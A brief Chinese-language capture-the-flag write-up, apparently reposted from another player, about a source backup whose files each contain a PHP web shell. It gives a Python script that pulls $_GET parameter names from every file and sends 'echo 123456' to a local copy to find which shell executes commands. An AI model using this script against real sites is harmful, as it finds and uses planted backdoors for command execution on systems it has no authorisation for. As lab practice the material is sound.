下載備份檔案，每個檔案都有shell，但是好多都不能用，

所以需要py指令碼篩選可用的shell，搬移一個大佬的wp

import re
import os
import requests

files = os.listdir('src/')    #獲取路徑下的所有檔案
reg = re.compile(r'(?<=_GET\[\').*(?=\'\])')   #設定正則
for i in files:                #從第一個檔案開始
    url = "http://127.0.0.1/src/" + i
    f = open("src/"+i)        #開啟這個檔案
 

    data = f.read()           #讀取檔案內容
    f.close()                 #關閉檔案
    result = reg.findall(data)  #從檔案中找到GET請求
    for j in result:           #從第一個GET引數開始
        payload = url + "?" + j + "=echo 123456"   ##嘗試請求次路徑，並執行命令
        print(payload)
        html = requests.get(payload)##通過r=request.get（url）構造一個向伺服器請求資源的url物件。
 

        if "123456" in html.text:
            print(payload)
            exit(1)

考察的還是指令碼編寫。好好理解這個